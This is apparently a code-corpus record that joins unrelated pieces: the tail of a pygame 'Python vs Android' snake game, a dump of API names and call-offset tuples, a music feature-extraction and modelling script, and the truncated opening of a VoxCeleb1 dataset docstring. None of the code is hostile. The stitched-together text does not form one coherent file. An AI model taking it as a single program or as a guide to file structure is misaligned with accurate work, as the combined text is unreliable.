            # swallowing SystemExit/KeyboardInterrupt.
            pass

    def saveSettings(self):
        """Write the current settings in the simple ``Key:value`` line format."""
        with open('resources/.settings', 'w') as f:
            f.write('Difficulty:' + str(self.difficulty) + '\n')
            f.write('Controls:' + str(self.controls) + '\n')
            f.write('Music:' + str(self.music) + '\n')
            f.write('Sound:' + str(self.sound) + '\n')
class GameField(Page):
    """In-game page: renders the snake board, the score HUD, and the on-screen controls."""
    def __init__(self, width, height, cell_size, surface):
        super(GameField, self).__init__(width, height, surface)
        self.cell_size = cell_size  # pixel size of one board cell
        self.game = None            # attached Game instance; set by the caller
    def _draw_arrow_pad(self, v_cx, h_cx, height):
        """Draw the four translucent arrow buttons.

        The up/down arrows are horizontally centred on ``v_cx`` and the
        left/right arrows on ``h_cx``.  The 'Buttons' and 'Inverted' control
        schemes are identical except for swapping these two centres, so both
        branches share this helper (the previous code duplicated all eight
        point lists).
        """
        mid_y = 5 * height / 7  # vertical centre line of the pad
        self.buttons['Up'] = pygame.draw.polygon(self.surface, GREY, [
            (v_cx - height / 14, mid_y - height / 28),
            (v_cx, 4 * height / 7 - height / 28),
            (v_cx + height / 14, mid_y - height / 28)
        ])
        self.buttons['Down'] = pygame.draw.polygon(self.surface, GREY, [
            (v_cx - height / 14, mid_y + height / 28),
            (v_cx, 6 * height / 7 + height / 28),
            (v_cx + height / 14, mid_y + height / 28)
        ])
        self.buttons['Left'] = pygame.draw.polygon(self.surface, GREY, [
            (h_cx - height / 28, mid_y + height / 14),
            (h_cx - height / 28 - height / 7, mid_y),
            (h_cx - height / 28, mid_y - height / 14)
        ])
        self.buttons['Right'] = pygame.draw.polygon(self.surface, GREY, [
            (h_cx + height / 28, mid_y + height / 14),
            (h_cx + height / 28 + height / 7, mid_y),
            (h_cx + height / 28, mid_y - height / 14)
        ])
    def update(self):
        """Redraw the playfield, HUD, and the control widgets for the active scheme."""
        super(GameField, self).update()
        self.surface.fill(BLACK)
        width = self.surface.get_width()
        height = self.surface.get_height()
        if self.game is not None:
            rect = self.display_text('Python: ' + str(self.game.snakes[0].score), height / 10, BLUE, (width / 8, height / 7), BLACK)
            self.display_text('x' + str(self.game.snakes[0].lives), height / 16, BLUE, (rect.right + width / 30, height / 7 - height / 100), BLACK)
            self.game.drawSnakes(self.surface, self.cell_size)
            if self.game.controls == CONTROLS.index('Touch'):
                # Touch scheme: split the screen into two invisible halves
                # perpendicular to the snake's current heading; the unused
                # axis gets zero-sized rects so it can never be hit.
                if self.game.snakes[0].direction % 2 == 0:
                    self.buttons['Up'] = Rect(0, 0, width, height / 2)
                    self.buttons['Down'] = Rect(0, height / 2, width, height / 2)
                    self.buttons['Left'] = Rect(0, 0, 0, 0)
                    self.buttons['Right'] = Rect(0, 0, 0, 0)
                else:
                    self.buttons['Left'] = Rect(0, 0, width / 2, height)
                    self.buttons['Right'] = Rect(width / 2, 0, width / 2, height)
                    self.buttons['Up'] = Rect(0, 0, 0, 0)
                    self.buttons['Down'] = Rect(0, 0, 0, 0)
            elif self.game.controls == CONTROLS.index('Buttons'):
                # Vertical pad on the left fifth, horizontal pad on the right.
                self._draw_arrow_pad(width / 5, 4 * width / 5, height)
            elif self.game.controls == CONTROLS.index('Inverted'):
                # Mirror image of the 'Buttons' layout.
                self._draw_arrow_pad(4 * width / 5, width / 5, height)
class Pause(Page):
    """Pause overlay: the captured game frame shown semi-transparent with menu/resume buttons."""
    def __init__(self, width, height, surface, game_surface):
        super(Pause, self).__init__(width, height, surface)
        # Fade the frozen game frame over a white backdrop.
        self.surface.fill(WHITE)
        self.game_surface = game_surface
        self.game_surface.set_alpha(220)
        self.surface.blit(self.game_surface, (0, 0))
        self.display_text('Paused', height / 4, YELLOW, (width / 2, height / 2))
        button_size = height / 8
        button_y = 3 * height / 4
        self.buttons['Menu'] = self.display_text('Back to Menu', button_size, RED, (5 * width / 16, button_y))
        self.buttons['Unpause'] = self.display_text('Resume', button_size, GREEN, (11 * width / 16, button_y))
class NotImplementedPage(Page):
    """Placeholder page shown for features that are not available yet."""
    def __init__(self, width, height, surface):
        super(NotImplementedPage, self).__init__(width, height, surface)
        self.display_text('Feature not yet implemented', height / 8, RED, (width / 2, 4 * height / 7))
        back_pos = (width / 16, 5 * height / 36)
        self.buttons['Menu'] = self.display_text('Back', height / 12, WHITE, back_pos)
class GameOver(Page):
    """End-of-game page: final score, top-3 leaderboard, and return/restart buttons."""
    def __init__(self, width, height, game, scores, surface):
        super(GameOver, self).__init__(width, height, surface)
        self.game = game
        self.scores = scores
        self.display_text('Game Over!', height / 4, RED, (width / 2, 2 * height / 6))
        if not self.game == None and len(self.game.snakes) == 1:
            final_score = self.game.snakes[0].score
            self.display_text('Score: ' + str(final_score), height / 8, GREEN, (width / 2, height / 2))
            self.display_text('Leaderboard:', height / 10, WHITE, (width / 2, 4 * height / 7 + height / 10))
            # Merge this run's score in, dedupe, and keep a descending ranking.
            self.scores.append(final_score)
            self.scores = sorted(set(self.scores), reverse=True)
            for rank in range(min(len(self.scores), 3)):
                # The player's own score is highlighted in green.
                colour = GREEN if self.scores[rank] == final_score else WHITE
                row_y = 4 * height / 7 + (rank + 2) * height / 11
                self.display_text(str(rank + 1) + '. ', height / 15, colour, (3 * width / 7, row_y))
                self.display_text(str(self.scores[rank]), height / 15, colour, (4 * width / 7, row_y))
        self.buttons['Menu'] = self.display_text('Return', height / 10, WHITE, (width / 7, 17 * height / 18))
        self.buttons['Restart'] = self.display_text('Restart', height / 10, WHITE, (6 * width / 7, 17 * height / 18))
class UserInterface:
    """Top-level controller: owns the pygame screen, the page objects, and the
    two event loops (menu pages vs. in-game) that route input to the current page.

    NOTE(review): the event-handling methods read the module-level globals
    ``width``, ``height`` and ``cell_size`` rather than the values passed to
    ``__init__`` — confirm that is intentional.
    """
    # Shared frame-rate limiter used by the in-game loop.
    clock = pygame.time.Clock()
    def __init__(self, width, height, cell_size):
        self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
        self.game = None
        self.pages = {}
        self.pages['Settings'] = Settings(width, height, self.screen)
        self.pages['Menu'] = Menu(width, height, self.screen)
        self.current_page = None
        self.update_flag = True   # when False, the main loop skips one redraw
        self.state = None         # screen snapshot saved when the app is backgrounded
    def fadeBetweenSurfaces(self, surface):
        """Fade *surface* in over the current screen by stepping its alpha."""
        for i in range(0, 255, ANIMATION_SPEED):
            surface.set_alpha(i)
            self.screen.blit(surface, (0,0))
            pygame.display.flip()
    def changePage(self, page):
        """Switch to *page*, persisting the state of the page being left.

        Leaving 'GameOver' (single player) saves the leaderboard; leaving
        'Settings' saves the settings file.  Music is switched before the
        page pointer changes because playMusic() inspects current_page.
        """
        if self.current_page == 'GameOver' and len(self.game.snakes) == 1:
            self.saveLeaderboard(self.pages[self.current_page].scores, self.game.fps)
        elif self.current_page == 'Settings':
            self.pages[self.current_page].saveSettings()
        self.playMusic(page)
        self.current_page = page
        self.update()
    def handleGame(self):
        """One frame of the in-game loop: poll events, steer the snake, advance the game.

        Returns False when the application should quit, True otherwise.
        """
        self.clock.tick(self.game.fps)
        # At most one direction change is accepted per frame.
        python_flag = False
        for event in pygame.event.get():
            if event.type == QUIT:
                return False
            elif event.type == APP_TERMINATING:
                return False
            elif event.type == APP_WILLENTERBACKGROUND:
                # Going to background: pause and keep a snapshot to restore from.
                self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
                self.changePage('Pause')
                self.state = self.screen.copy()
                return True
            elif event.type == KEYDOWN:
                # NOTE(review): 'pressed' stays unbound when the key is not the
                # Android back key, and the checks below would then raise
                # NameError — confirm whether other KEYDOWN events can occur.
                if event.key == pygame_sdl2.K_AC_BACK:
                    pressed = 'Pause'
            elif event.type == FINGERDOWN:
                pressed = self.pages[self.current_page].getButton(event.x, event.y)
            else:
                continue
            if pressed == 'Menu':
                self.pages['Confirm'] = Confirm(width, height, self.screen, self.screen.copy())
                self.changePage('Confirm')
            elif pressed == 'Pause':
                self.pages['Pause'] = Pause(width, height, self.screen, self.screen.copy())
                self.changePage('Pause')
            elif pressed == 'Up' and not python_flag:
                if self.game.snakes[0].changeDirection(3):
                    python_flag = True
            elif pressed == 'Down' and not python_flag:
                if self.game.snakes[0].changeDirection(1):
                    python_flag = True
            elif pressed == 'Left' and not python_flag:
                if self.game.snakes[0].changeDirection(2):
                    python_flag = True
            elif pressed == 'Right' and not python_flag:
                if self.game.snakes[0].changeDirection(0):
                    python_flag = True
            else:
                continue
        # Advance the simulation; a falsy result means the game has ended.
        if not self.game.updateSnakes():
            self.pages['GameOver'] = GameOver(self.screen.get_width(), self.screen.get_height(), self.game, self.loadLeaderboard(self.game.fps), self.screen)
            self.changePage('GameOver')
        return True
    def handle(self):
        """Blocking event loop for all non-game pages.

        Waits for one meaningful event, maps it to a button name ('pressed'),
        then dispatches on it.  Returns False to quit the application, True
        to keep running.
        """
        while True:
            event = pygame.event.wait()
            if event.type == QUIT:
                return False
            elif event.type == APP_TERMINATING:
                return False
            elif event.type == APP_WILLENTERBACKGROUND:
                self.state = self.screen.copy()
                return True
            elif event.type == APP_DIDENTERFOREGROUND:
                # Recreate the display and restore the saved snapshot.
                self.screen = pygame.display.set_mode((width, height), pygame.HWSURFACE)
                self.pages['Game'] = GameField(width, height, cell_size, self.screen)
                self.pages['Game'].game = self.game
                self.screen.blit(self.state, (0, 0))
                pygame.display.flip()
                return True
            elif event.type == KEYDOWN:
                if event.key == pygame_sdl2.K_AC_BACK:
                    # Back key: quit from the menu, otherwise go back to it.
                    if self.current_page == 'Menu':
                        return False
                    else:
                        pressed = 'Menu'
                        break
            elif event.type == FINGERDOWN:
                pressed = self.pages[self.current_page].getButton(event.x, event.y)
                break
            else:
                continue
        if pressed == 'Single':
            self.game = Game(1, list(DIFFICULTY.values())[self.pages['Settings'].difficulty], self.pages['Settings'].controls)
            self.pages['Game'] = GameField(width, height, cell_size, self.screen)
            self.pages['Game'].game = self.game
            self.changePage('Game')
        elif pressed == 'Multi':
            # self.game = Game(2, EASY if self.pages['Settings'].easy else HARD)
            # self.pages['Game'].game = self.game
            # self.pages['GameOver'].game = self.game
            # self.changePage('Game')
            self.pages['NotImplemented'] = NotImplementedPage(width, height, self.screen)
            self.changePage('NotImplemented')
        elif pressed == 'Settings':
            self.pages['Settings'] = Settings(width, height, self.screen)
            self.changePage('Settings')
        elif pressed == 'Leaderboard':
            self.pages['Leaderboard'] = Leaderboard(width, height, self.screen)
            self.pages['Leaderboard'].scores[DIFFICULTY['Easy']] = self.loadLeaderboard(DIFFICULTY['Easy'])
            self.pages['Leaderboard'].scores[DIFFICULTY['Normal']] = self.loadLeaderboard(DIFFICULTY['Normal'])
            self.pages['Leaderboard'].scores[DIFFICULTY['Hard']] = self.loadLeaderboard(DIFFICULTY['Hard'])
            self.changePage('Leaderboard')
        elif pressed == 'Difficulty':
            # Cycle through the three difficulty levels.
            self.pages['Settings'].difficulty = (self.pages['Settings'].difficulty + 1) % 3
        elif pressed == 'Controls':
            self.pages['Settings'].controls = (self.pages['Settings'].controls + 1) % len(CONTROLS)
        elif pressed == 'Sound':
            self.pages['Settings'].sound = not self.pages['Settings'].sound
            for sound in SOUNDS.values():
                sound.set_volume(1 if self.pages['Settings'].sound else 0)
        elif pressed == 'Music':
            self.pages['Settings'].music = not self.pages['Settings'].music
            pygame.mixer.music.set_volume(1 if self.pages['Settings'].music else 0)
        elif pressed == 'Menu':
            self.pages['Menu'] = Menu(width, height, self.screen)
            self.changePage('Menu')
        elif pressed == 'Unpause':
            self.changePage('Game')
        elif pressed == 'Yes':
            # Confirmation dialog: abandon the game, back to the menu.
            self.pages['Menu'] = Menu(width, height, self.screen)
            self.changePage('Menu')
        elif pressed == 'No':
            self.changePage('Game')
        elif pressed == 'Restart':
            self.game = self.game.restart()
            self.pages['Game'] = GameField(width, height, cell_size, self.screen)
            self.pages['Game'].game = self.game
            self.changePage('Game')
        elif pressed == 'Quit':
            return False
        else:
            # Tap missed every button: suppress the next redraw.
            self.update_flag = False
        return True
    def update(self):
        """Redraw the current page and present the frame."""
        self.pages[self.current_page].update()
        pygame.display.flip()
    def playMusic(self, page):
        """Adjust background music for a transition from current_page to *page*.

        Settings/NotImplemented/Leaderboard transitions (in either direction)
        leave the music untouched; entering 'Game' resumes or starts the
        per-difficulty track; entering 'Pause' pauses it.
        """
        if not self.current_page == 'Settings' and not self.current_page == 'NotImplemented' and not self.current_page == 'Leaderboard':
            if page == 'Game':
                if self.current_page == 'Pause':
                    pygame.mixer.music.unpause()
                else:
                    pygame.mixer.music.load(MUSIC[self.game.fps])
                    pygame.mixer.music.play(loops=-1)
            elif page == 'Pause':
                pygame.mixer.music.pause()
            elif not page == 'Settings' and not page == 'NotImplemented' and not page == 'Leaderboard':
                pygame.mixer.music.load(MUSIC[page])
                pygame.mixer.music.play(loops=-1)
    def loadLeaderboard(self, difficulty):
        """Return the saved scores (list of int) for *difficulty*, or [] on any error.

        NOTE(review): the bare except also hides 'file' being unbound for an
        unknown difficulty value — consider narrowing.
        """
        scores = []
        try:
            if difficulty == DIFFICULTY['Easy']:
                file = 'resources/.easy'
            elif difficulty == DIFFICULTY['Normal']:
                file = 'resources/.normal'
            elif difficulty == DIFFICULTY['Hard']:
                file = 'resources/.hard'
            with open(file, 'r') as f:
                for line in f:
                    scores.append(int(line.strip()))
        except:
            scores = []
        return scores
    def saveLeaderboard(self, scores, difficulty):
        """Write the top three *scores* to the per-difficulty leaderboard file."""
        if difficulty == DIFFICULTY['Easy']:
            file = 'resources/.easy'
        elif difficulty == DIFFICULTY['Normal']:
            file = 'resources/.normal'
        elif difficulty == DIFFICULTY['Hard']:
            file = 'resources/.hard'
        with open(file, 'w') as f:
            for s in scores[:3]:
                f.write(str(s) + '\n')
# Init
pygame.init()
pygame.display.set_caption('Python vs Android')
# Colors
BLACK = (0, 0, 0)
WHITE = (255, 255, 255)
GREY = (255, 255, 255, 80)  # translucent white used for the on-screen arrow pad
RED = (255, 0, 0)
GREEN = (0, 255, 0)
BLUE = (0, 0, 255)
YELLOW = (255, 255, 0)
CYAN = (0, 255, 255)
MAGENTA = (255, 0, 255)
# Render colour for each apple type.
APPLE_COLORS = {
    AppleTypes.NORMAL : RED,
    AppleTypes.GOLDEN : YELLOW,
    AppleTypes.LIFE : MAGENTA,
    AppleTypes.SPECIAL : CYAN
}
# FPS — difficulty is expressed as the game's frame rate.
DIFFICULTY = {
    'Easy' : 15,
    'Normal' : 25,
    'Hard': 35
}
# Controls — the available control schemes, cycled by the Settings page.
CONTROLS = ['Touch', 'Buttons', 'Inverted']
# Music — track per page; in-game tracks are keyed by the difficulty fps value.
MUSIC = {
    'Menu' : 'resources/intro.wav',
    DIFFICULTY['Easy'] : 'resources/easy.wav',
    DIFFICULTY['Normal'] : 'resources/normal.wav',
    DIFFICULTY['Hard'] : 'resources/hard.wav',
    'Pause' : None,
    'Confirm' : None,
    'GameOver' : 'resources/game_over.wav'
}
# Sounds
SOUNDS = {
    'Apple' : pygame.mixer.Sound('resources/apple.wav'),
    'Golden' : pygame.mixer.Sound('resources/golden.wav'),
    'Life' : pygame.mixer.Sound('resources/life.wav'),
    'Special' : pygame.mixer.Sound('resources/special.wav'),
    'Hit' : pygame.mixer.Sound('resources/hit.wav'),
}
# Utils
ANIMATION_SPEED = 20
APPLE_EXPIRATION = 120
SNAKE_EXPIRATION = 40
SPECIAL_FRAMES = 3
# Adapt size to screen: fix 36 cells vertically and derive the cell size and
# horizontal cell count from the physical display resolution.
width = pygame.display.Info().current_w
height = pygame.display.Info().current_h
CELL_COUNT_Y = 36
cell_size = int(height / CELL_COUNT_Y)
CELL_COUNT_X = int(width / cell_size)
ui = UserInterface(width, height, cell_size)
ui.changePage('Menu')
running = True
# Loop: the in-game page runs a polling loop, every other page blocks on events.
while running:
    if ui.current_page == 'Game':
        running = ui.handleGame()
    else:
        running = ui.handle()
        if ui.update_flag:
            ui.update()
        else:
            ui.update_flag = True
# while/else: there is no break in the loop, so this always runs on shutdown
# and persists the settings one last time.
else:
    ui.pages['Settings'].saveSettings()
# Quit
pygame.quit()
|
[
"pygame.event.wait",
"pygame.event.get",
"pygame.display.Info",
"pygame.mixer.music.pause",
"random.randint",
"pygame.display.set_mode",
"pygame.mixer.music.play",
"pygame.draw.polygon",
"pygame.display.set_caption",
"android.vibrate",
"pygame.mixer.Sound",
"pygame.quit",
"pygame.Surface",
"pygame.init",
"pygame_sdl2.import_as_pygame",
"pygame.time.Clock",
"pygame.mixer.music.unpause",
"random.choice",
"pygame.display.flip",
"pygame.mixer.music.set_volume",
"pygame.mixer.music.load"
] |
[((19, 49), 'pygame_sdl2.import_as_pygame', 'pygame_sdl2.import_as_pygame', ([], {}), '()\n', (47, 49), False, 'import pygame_sdl2\n'), ((32136, 32149), 'pygame.init', 'pygame.init', ([], {}), '()\n', (32147, 32149), False, 'import pygame\n'), ((32150, 32197), 'pygame.display.set_caption', 'pygame.display.set_caption', (['"""Python vs Android"""'], {}), "('Python vs Android')\n", (32176, 32197), False, 'import pygame\n'), ((34016, 34029), 'pygame.quit', 'pygame.quit', ([], {}), '()\n', (34027, 34029), False, 'import pygame\n'), ((23191, 23210), 'pygame.time.Clock', 'pygame.time.Clock', ([], {}), '()\n', (23208, 23210), False, 'import pygame\n'), ((33075, 33116), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/apple.wav"""'], {}), "('resources/apple.wav')\n", (33093, 33116), False, 'import pygame\n'), ((33137, 33179), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/golden.wav"""'], {}), "('resources/golden.wav')\n", (33155, 33179), False, 'import pygame\n'), ((33198, 33238), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/life.wav"""'], {}), "('resources/life.wav')\n", (33216, 33238), False, 'import pygame\n'), ((33260, 33303), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/special.wav"""'], {}), "('resources/special.wav')\n", (33278, 33303), False, 'import pygame\n'), ((33321, 33360), 'pygame.mixer.Sound', 'pygame.mixer.Sound', (['"""resources/hit.wav"""'], {}), "('resources/hit.wav')\n", (33339, 33360), False, 'import pygame\n'), ((33496, 33517), 'pygame.display.Info', 'pygame.display.Info', ([], {}), '()\n', (33515, 33517), False, 'import pygame\n'), ((33537, 33558), 'pygame.display.Info', 'pygame.display.Info', ([], {}), '()\n', (33556, 33558), False, 'import pygame\n'), ((625, 676), 'random.choice', 'random.choice', (['[0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3]'], {}), '([0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 2, 3])\n', (638, 676), False, 'import random\n'), ((753, 780), 'random.choice', 'random.choice', (['[0, 1, 2, 3]'], 
{}), '([0, 1, 2, 3])\n', (766, 780), False, 'import random\n'), ((2303, 2341), 'pygame.Surface', 'pygame.Surface', (['(cell_size, cell_size)'], {}), '((cell_size, cell_size))\n', (2317, 2341), False, 'import pygame\n'), ((5820, 5858), 'pygame.Surface', 'pygame.Surface', (['(cell_size, cell_size)'], {}), '((cell_size, cell_size))\n', (5834, 5858), False, 'import pygame\n'), ((11582, 11635), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (['(1 if self.music else 0)'], {}), '(1 if self.music else 0)\n', (11611, 11635), False, 'import pygame\n'), ((23284, 23342), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(width, height)', 'pygame.HWSURFACE'], {}), '((width, height), pygame.HWSURFACE)\n', (23307, 23342), False, 'import pygame\n'), ((24317, 24335), 'pygame.event.get', 'pygame.event.get', ([], {}), '()\n', (24333, 24335), False, 'import pygame\n'), ((30429, 30450), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (30448, 30450), False, 'import pygame\n'), ((323, 358), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_X - 1)'], {}), '(0, CELL_COUNT_X - 1)\n', (337, 358), False, 'import random\n'), ((380, 415), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_Y - 1)'], {}), '(0, CELL_COUNT_Y - 1)\n', (394, 415), False, 'import random\n'), ((1024, 1239), 'random.choice', 'random.choice', (['[self.direction, self.direction, self.direction, self.direction, self.\n direction, self.direction, self.direction, (self.direction + 1) % 4, (\n self.direction + 2) % 4, (self.direction + 3) % 4]'], {}), '([self.direction, self.direction, self.direction, self.\n direction, self.direction, self.direction, self.direction, (self.\n direction + 1) % 4, (self.direction + 2) % 4, (self.direction + 3) % 4])\n', (1037, 1239), False, 'import random\n'), ((23799, 23820), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (23818, 23820), False, 'import pygame\n'), ((26369, 26388), 'pygame.event.wait', 
'pygame.event.wait', ([], {}), '()\n', (26386, 26388), False, 'import pygame\n'), ((6309, 6344), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_X / 2)'], {}), '(0, CELL_COUNT_X / 2)\n', (6323, 6344), False, 'import random\n'), ((6346, 6381), 'random.randint', 'random.randint', (['(0)', '(CELL_COUNT_Y / 2)'], {}), '(0, CELL_COUNT_Y / 2)\n', (6360, 6381), False, 'import random\n'), ((7135, 7155), 'android.vibrate', 'android.vibrate', (['(0.2)'], {}), '(0.2)\n', (7150, 7155), False, 'import android\n'), ((6459, 6509), 'random.randint', 'random.randint', (['(CELL_COUNT_X / 2)', '(CELL_COUNT_X - 1)'], {}), '(CELL_COUNT_X / 2, CELL_COUNT_X - 1)\n', (6473, 6509), False, 'import random\n'), ((6511, 6561), 'random.randint', 'random.randint', (['(CELL_COUNT_Y / 2)', '(CELL_COUNT_Y - 1)'], {}), '(CELL_COUNT_Y / 2, CELL_COUNT_Y - 1)\n', (6525, 6561), False, 'import random\n'), ((15636, 15686), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (15655, 15686), False, 'import pygame\n'), ((16010, 16060), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (16029, 16060), False, 'import pygame\n'), ((16409, 16459), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (16428, 16459), False, 'import pygame\n'), ((16809, 16859), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (16828, 16859), False, 'import pygame\n'), ((30720, 30748), 'pygame.mixer.music.unpause', 'pygame.mixer.music.unpause', ([], {}), '()\n', (30746, 30748), False, 'import pygame\n'), ((30791, 30836), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['MUSIC[self.game.fps]'], {}), '(MUSIC[self.game.fps])\n', (30814, 30836), False, 'import pygame\n'), ((30857, 30890), 'pygame.mixer.music.play', 
'pygame.mixer.music.play', ([], {'loops': '(-1)'}), '(loops=-1)\n', (30880, 30890), False, 'import pygame\n'), ((30941, 30967), 'pygame.mixer.music.pause', 'pygame.mixer.music.pause', ([], {}), '()\n', (30965, 30967), False, 'import pygame\n'), ((17260, 17310), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (17279, 17310), False, 'import pygame\n'), ((17646, 17696), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (17665, 17696), False, 'import pygame\n'), ((18033, 18083), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (18052, 18083), False, 'import pygame\n'), ((18421, 18471), 'pygame.draw.polygon', 'pygame.draw.polygon', (['self.surface', 'GREY', 'pointlist'], {}), '(self.surface, GREY, pointlist)\n', (18440, 18471), False, 'import pygame\n'), ((31088, 31124), 'pygame.mixer.music.load', 'pygame.mixer.music.load', (['MUSIC[page]'], {}), '(MUSIC[page])\n', (31111, 31124), False, 'import pygame\n'), ((31141, 31174), 'pygame.mixer.music.play', 'pygame.mixer.music.play', ([], {'loops': '(-1)'}), '(loops=-1)\n', (31164, 31174), False, 'import pygame\n'), ((26747, 26805), 'pygame.display.set_mode', 'pygame.display.set_mode', (['(width, height)', 'pygame.HWSURFACE'], {}), '((width, height), pygame.HWSURFACE)\n', (26770, 26805), False, 'import pygame\n'), ((27013, 27034), 'pygame.display.flip', 'pygame.display.flip', ([], {}), '()\n', (27032, 27034), False, 'import pygame\n'), ((29502, 29573), 'pygame.mixer.music.set_volume', 'pygame.mixer.music.set_volume', (["(1 if self.pages['Settings'].music else 0)"], {}), "(1 if self.pages['Settings'].music else 0)\n", (29531, 29573), False, 'import pygame\n')]
|
# Functions
from extract import extract
from model import model
import os
# Logging
import logging
logging.basicConfig(level=logging.INFO)
# Output directory for every csv produced by the pipeline.
# NOTE(review): 'dir' shadows the builtin of the same name.
dir = '/Users/alexandrasmith/ds/metis/proj3_mcnulty/PROJ_FILES/major_or_minor_song_classification'
# filepath_to_music --> Edit as needed: directory holding the source music files
filepath = 'sample_music_files'
# desired_clip_length --> Edit as needed (suggested: 30): clip length in seconds
clip_sec = 30
# path_for_sliced_clips --> Edit as needed: directory for the sliced clips
export_path = 'sample_music_files_sliced'
def main(filepath_to_music, desired_clip_length, path_for_sliced_clips):
    """Extract audio features, build models, and export all results as csv.

    Pipeline:
      1. Slice each music file into clips of ``desired_clip_length`` seconds
         and extract audio features into a pandas DataFrame.
      2. Export the feature DataFrame to ``<dir>/<length>_sec_data.csv``.
      3. Train models on that csv and export their performance
         (``..._sec_performance.csv``) and holdout results
         (``..._sec_holdout.csv``).

    The sliced clips in ``path_for_sliced_clips`` can be deleted once the
    csv has been exported.

    :param filepath_to_music: str, directory containing the source music files
    :param desired_clip_length: int, clip length in seconds (suggested: 30)
    :param path_for_sliced_clips: str, directory to hold the sliced clips
    :return: None; all results are written under the module-level directory ``dir``
    """
    # The module-level output directory 'dir' is only read here, so the old
    # 'global dir' declaration was unnecessary and has been dropped.
    logging.info('Extracting features...')
    data = extract(filepath_to_music, desired_clip_length, path_for_sliced_clips)
    logging.info('Done with extraction.')
    # makedirs(exist_ok=True) also creates missing parents and avoids the
    # race between the previous exists() check and mkdir().
    os.makedirs(dir, exist_ok=True)
    # The same csv is written once and then consumed by model(); build the
    # path a single time.
    data_csv = os.path.join(dir, f'{desired_clip_length}_sec_data.csv')
    data.to_csv(data_csv, index=False)
    logging.info('Data exported to csv.')
    logging.info('Building models...')
    model_perf, holdout_perf = model(data_csv)
    # Export dataframes of performance as csv
    model_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_performance.csv'), index=False)
    holdout_perf.to_csv(os.path.join(dir, f'{desired_clip_length}_sec_holdout.csv'), index=False)
    logging.info('Finished.')
# Script entry point: run the full pipeline with the module-level defaults.
if __name__ == '__main__':
    main(filepath, clip_sec, export_path)
|
[
"os.mkdir",
"extract.extract",
"logging.basicConfig",
"os.path.exists",
"logging.info",
"os.path.join"
] |
[((101, 140), 'logging.basicConfig', 'logging.basicConfig', ([], {'level': 'logging.INFO'}), '(level=logging.INFO)\n', (120, 140), False, 'import logging\n'), ((1180, 1218), 'logging.info', 'logging.info', (['"""Extracting features..."""'], {}), "('Extracting features...')\n", (1192, 1218), False, 'import logging\n'), ((1273, 1343), 'extract.extract', 'extract', (['filepath_to_music', 'desired_clip_length', 'path_for_sliced_clips'], {}), '(filepath_to_music, desired_clip_length, path_for_sliced_clips)\n', (1280, 1343), False, 'from extract import extract\n'), ((1349, 1386), 'logging.info', 'logging.info', (['"""Done with extraction."""'], {}), "('Done with extraction.')\n", (1361, 1386), False, 'import logging\n'), ((1611, 1648), 'logging.info', 'logging.info', (['"""Data exported to csv."""'], {}), "('Data exported to csv.')\n", (1623, 1648), False, 'import logging\n'), ((1653, 1687), 'logging.info', 'logging.info', (['"""Building models..."""'], {}), "('Building models...')\n", (1665, 1687), False, 'import logging\n'), ((2070, 2095), 'logging.info', 'logging.info', (['"""Finished."""'], {}), "('Finished.')\n", (2082, 2095), False, 'import logging\n'), ((1445, 1464), 'os.path.exists', 'os.path.exists', (['dir'], {}), '(dir)\n', (1459, 1464), False, 'import os\n'), ((1474, 1487), 'os.mkdir', 'os.mkdir', (['dir'], {}), '(dir)\n', (1482, 1487), False, 'import os\n'), ((1535, 1591), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_data.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_data.csv')\n", (1547, 1591), False, 'import os\n'), ((1762, 1818), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_data.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_data.csv')\n", (1774, 1818), False, 'import os\n'), ((1889, 1952), 'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_performance.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_performance.csv')\n", (1901, 1952), False, 'import os\n'), ((1991, 2050), 
'os.path.join', 'os.path.join', (['dir', 'f"""{desired_clip_length}_sec_holdout.csv"""'], {}), "(dir, f'{desired_clip_length}_sec_holdout.csv')\n", (2003, 2050), False, 'import os\n')]
|
"""
Description: Dataset from VoxCeleb1
Author: <NAME>
Date: 2020.11.26
VoxCeleb1:
- From iden_split.txt to the training and validation set.
    - From iden_split.txt to evaluate the identification task.
- From veri_test2.txt, list_test_all2.txt, and list_test_hard2.txt to
evaluate the corresponding verification task.
File Directory: voxceleb1/{speaker_id}/{utterance_id}/*.wav
Indices List:
- Speaker Identification: iden_split.txt
- Speaker Verification: veri_test2.txt, list_test_hard2.txt, list_test_all2.txt
List Template:
- iden_split.txt
